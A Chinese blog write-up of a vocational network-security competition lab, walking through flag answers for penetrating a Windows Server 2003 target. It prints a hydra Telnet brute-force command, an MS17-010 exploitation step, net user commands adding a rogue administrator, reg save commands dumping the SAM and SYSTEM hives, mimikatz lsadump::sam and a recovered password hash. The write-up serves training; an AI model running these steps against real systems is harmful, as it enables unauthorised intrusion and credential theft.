B-1:Windows操作系统渗透测试

最新推荐文章于 2024-10-23 10:32:00 发布
最新推荐文章于 2024-10-23 10:32:00 发布
阅读量2.3k 收藏 29
点赞数 7
分类专栏: # 2022年福建省中职组“网络安全”赛项 文章标签: windows 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_45155797/article/details/130182279
版权
该文详细描述了使用KaliLinux对WindowsServer2003和Windows7进行渗透测试的过程,包括服务扫描、Telnet服务的暴力破解、SAM和System文件的提取以及使用Mimikatz工具获取密码信息。
摘要由CSDN通过智能技术生成 
B-1:Windows操作系统渗透测试
服务器场景:Server2003
服务器场景操作系统:Windows7
1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;
2. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)
3. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)
4. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
5. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;
6. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取teltest密码信息,将提取信息的命令作为FLAG提交;
7. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取administrators密码信息,将提取到的hash值作为FLAG提交;

1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;


flag:232

2.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)


flag:hydra -l teltest -P /usr/share/wordlists/dirb/small.txt telnet://172.16.102.248 -s 232

3.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)


flag:customer

4.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;

提取sam文件需要administrator权限,我们查看靶机445端口尝试利用ms17-010漏洞获取shell


添加一个管理员用户,远程桌面进去
net user syh 111111 /add
net localgroup administrators syh /add


flag:reg save hklm\sam sam.hive

5.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;


flag:reg save hklm\system system.hive
6.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取teltest密码信息,将提取信息的命令作为FLAG提交;

flag:lsadump::sam
7.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取administrators密码信息,将提取到的hash值作为FLAG提交;

flag:6cfa9ce05f0afaa483beaea6567ea26e

Wh1teSu
关注
专栏目录
网络安全技能大赛-Windows操作系统渗透测试
Jay
04-02 3284
Windows操作系统渗透测试 第一步,打开网络拓扑,点击启动选项,启动实验虚拟机 第二步,使用ifconfig或ipconfig命令获取地址 确认渗透机ip地址:172.16.1.100 确认靶机ip地址:172.16.1.200 1.通过本地PC渗透测试平台Kali2.0对服务器场景p100_win03-22进行系统服务及版本扫描渗透测试,并将该操作显示结果445端口对应的服务版本信息字符串作为Flag值提交; 进入kali命令控制台使用nmap工具 Flag:Microso
2022年江西省职组“网络空间安全”赛项模块B-Web渗透测试
Aluxian_的博客
01-15 3992
2022年职组山西省“网络空间安全”赛项B-8:Web渗透测试任务书B-8:Web渗透测试解析不懂可以私信博主! 一、竞赛时间 420分钟 共计7小时 吃饭一小时 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第①阶段: 单兵模式系统渗透测试 任务一: 系统漏洞利用与提权 任务二: Linux操作系统渗透测试 任务三: 应用服务漏洞扫描与利用 任务四: SQL注入测试(PL) 任务五: 应急响应 任务六: 流量分析 任务七: 渗透测试 任务八: Web渗透测试 任务九:Windows操作系统
Windows、Linux常见的渗透测试命令
weixin_46239998的博客
04-06 1426
渗透测试命令
湖南省第一届职业技能大赛网络安全竞赛赛卷样题
最新发布
Aluxian_的博客
10-23 1043
1.从靶机服务器场景 1 的 FTP 服务器下载可执行文件linux_elf_01 以及 C 程序源文件 linux_elf_01.c,通过攻击机调试工具,对以上可执行文件 linux_elf_01 进行逆向分析,并利用逆向分析的结果,完善 C 程序源文件linux_elf_01.c,补充该 C 程序源文件当空缺的 FLAG01 字符串(以 F1 占位),并将该字符串通过 MD5 运算后返回哈希值的十六进制结果作为 Flag 值提交(形式:十六进制字符串);(形式:XXX:XXX:XXX:XXX;
2024全国职业技能大赛-网络安全赛题解析总结①(超详细)_kali渗透 技能大赛
2401_86044376的博客
08-26 1272
5.改变默认mysql管理员用户为:SuperRoot;6.使用mysql内置MD5加密函数加密用户user1的密码为(P@ssw0rd1!7.对Web网站进行HTTP重定向HTTPS设置,仅使用HTTPS协议访问网站(Windows)(注:证书颁发给test.com 并通过https://www.test.com访问Web网站)。8.将Web服务器开启审核策略登录事件 成功/失败;特权使用 成功;策略更改 成功/失败;进程跟踪 成功/失败。9.Windows系统禁用445端口;
Windows 免费渗透测试套件,包含140多款工具
Innocence_0的博客
02-06 309
Windows 免费渗透测试套件,包含140多款工具
Linux操作系统渗透
JJH2724719395的博客
04-15 707
linux操作系统渗透
Windows渗透测试
Dark0518的博客
11-15 4335
接上文,上一篇文章,我们了解了软件渗透测试的相关入门基础,那这篇文章我们就来聊聊对于Windows渗透测试吧 首先,还是我们的开头三问:是什么、为什么、如何Windows服务是什么? 一、什么是windows服务 windows服务的作用: (1)服务决定了计算机的一些功能是否被启用 (2)不同的服务对应的功能不同 (3)通过计算机提供的服务可以有效实现资源共享 常见的服务: web服务、dns服务、dhcp服务、邮件服务、telnet服务、ssh服务、smb服务 二、端口(1)端口分
windows渗透测试
Aluxian_的博客
05-25 9432
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试,并将该操作显示结果8080端口对应的服务版本信息字符串作为Flag值提交; 使用nmap -sV -n 靶机IP flag:Microsoft IIS httpd 5.1 1.2. 通过本地PC渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测
Windows操作系统渗透测试
wdnmddbl的博客
06-11 1242
路漫漫其修远兮,吾将上下而求索。文章涉及命令和思路在总结此题环境本意开源,奈何白嫖党太多,转手就倒卖,伤心!设置一个门槛吧可以和我换环境或者5元拿走此环境。当然你如果是真心学习,我可以免费给环境,但是要在二天之内出一个关于此题的wp,如有违约,下不奉陪。开源万岁!我只是个想在大学期间学习好找工作菜鸡。大概思路和涉及的知识点nmap -sV -A -p- 是一个在命令行使用的命令,它使用Nmap(网络映射)工具进行网络扫描。
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
平台选项 (`--platform`) 是指payload所针对的操作系统,如`windows`、`linux`或`android`。`msfvenom --help-platforms`命令列出所有支持的平台,确保payload与目标系统兼容。 生成payload时,还需要指定输出格式 ...
网络安全B模块(笔记详解)- Windows操作系统渗透测试
weixin_57536426的博客
12-24 1171
(字典路径/usr/share/wordlists/dirb/small.txt)5. 通过本地PC渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统system文件使用reg相关命令提取,将完整命令作为FLAG提交;4. 通过本地PC渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
B-3任务三:SSH弱口令渗透测试
m0_57032269的博客
05-13 1501
*任务说明:仅能获取Server3的IP地址 1.在渗透机Kali2.0使用Zenmap工具扫描靶机场景所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令必须要添加的字符串作为Flag值提交(忽略ip地址); 命令:nmap -p21,22,23目标IP Flag:-p21,22,23 2.通过渗透机Kali2.0对靶机场景进行系统服务及版本扫描渗透测试,并将该操作显示结果SSH服务对应的服务端口信...
网络安全B模块(笔记详解)- Linux操作系统渗透测试
weixin_57536426的博客
12-25 1190
1.通过本地PC渗透测试平台Kali对服务器场景Server4进行系统服务及版本扫描渗透测试,并将该操作显示结果21端口对应的服务版本信息字符串作为flag值提交;2.找到/var/www目录的图片文件,将文件名称作为flag值提交;使用nikto来扫描网页发现访问查看使用burp来抓包把抓到的信息保存下来使用sqlmap来识别得到密码登入网页创建木马把这个复制到404页面 这个就可以用nc来连接 Nc -lnvp 8888 就可以了 使用msf创建木马访问404页面。
Windows系统渗透基础(一)
魏宇轩
07-14 908
Windows基础篇 系统目录 Windows program files 用户 perflogs perfLogs perflogs是win7的日志信息,如磁盘扫描错误信息,删掉可以,但不建议删,删掉反而会降低系统速度,perfLogs是系统自动生成的 服务 服务是一种应用程序类型,它在后台运行。服务应用程序通常可以在本地和通过网络为用户提供一些功能,例如客户端/服务器应用程序、Web...
Server2003——Windows操作系统渗透测试
2202_75858632的博客
01-28 470
任务环境说明:服务器场景:Server2003(开放链接)服务器场景操作系统Windows7 1.通过本地PC渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果Telnet服务对应的端口号作为FLAG提交;Flag:2322.通过本地PC渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kalihydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当FLAG进行提交(例:nmap -
windows渗透测试入门
Han_V_Qin的博客
11-10 565
一、windows服务     windows服务的作用:         服务决定了计算机的一些功能是否被启用         不同的服务对应的功能不同         通过计算机提供的服务可以有效实现资源共享       常见的服务:         web服务、dns服务、dhcp服务、邮件服务、telnet服务、ssh服务、smb服务   二、端口     1、端口分为著名端口和动态端口两种         知名端口即众所周知的端口号,范围从0到1023,这些端口号一般固定分配给
.通过本地pc渗透测试平台kali对靶机场景进行系统服务及版本扫描渗透测试,并将该
09-16
渗透测试是一种计算机安全评估方法,用于评估系统、网络或应用程序的安全性。Kali是一个流行的渗透测试平台,它集成了众多渗透测试工具和资源。 在对靶机场景进行系统服务及版本扫描渗透测试时,我们可以使用Kali上的工具来发现目标主机上运行的系统服务以及其版本信息。这些信息对渗透测试者来说非常重要,因为它们可以揭示系统的弱点和漏洞。 Kali上有很多用于系统服务及版本扫描的工具,其最常用的包括Nmap和OpenVAS。Nmap是一个强大的网络扫描工具,可以快速发现目标主机上运行的开放端口和正在运行的服务。通过Nmap可以获取系统服务的版本信息,从而更好地了解目标主机的安全状况。 另外,OpenVAS则是一个开放源代码的漏洞扫描工具,它可以自动检测目标主机上存在的已知漏洞。OpenVAS可以利用已知的系统服务及其版本信息来扫描目标主机,并提供详细的报告和建议。 在使用Kali进行系统服务及版本扫描渗透测试时,我们需要确保遵守法律和道德规范。渗透测试需要获得合法的授权,并在授权范围内进行。同时,我们要保护目标系统的安全,避免造成任何损害和不必要的干扰。 综上所述,通过Kali进行系统服务及版本扫描渗透测试可以帮助我们更好地了解目标系统的安全性,并提供有针对性的建议和解决方案。这对于评估系统的弱点和加强安全防护非常有帮助。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值